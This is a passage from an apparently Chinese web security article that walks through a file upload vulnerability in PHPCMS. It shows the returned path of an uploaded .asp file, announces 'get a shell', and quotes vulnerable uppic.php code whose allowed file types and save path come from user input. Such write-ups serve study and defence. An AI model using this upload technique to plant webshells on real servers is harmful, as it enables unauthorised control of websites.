var ctl_upbutten=window.opener.document.getElementById("upload");
ctl_hurl.value="ads/uploadfile/200612/20061206054522605.asp";
ctl_hurl.style.background="white";
self.close();
</script>
Okay, get a shell

还有uppic.php也有同样漏洞，漏洞代码如下 $fileArr = array('file'=>$uploadfile,'name'=>$uploadfile_name,'size'=>$uploadfile_size,'type'=>$uploadfile_type);

$uploadfiletype = $uploadfiletype ? $uploadfiletype : $_PHPCMS['uploadfiletype'];
$savepath = $uploaddir ? $channeldir."/".$uploaddir."/".date("Ym")."/" : $_PHPCMS['uploaddir']."/".date("Ym")."/";利用原理一样................... -:)
上一页 1 2下一页

上一篇：教你防御网络游戏外挂暗藏木马全攻略
下一篇：防范拒绝服务攻击妙招儿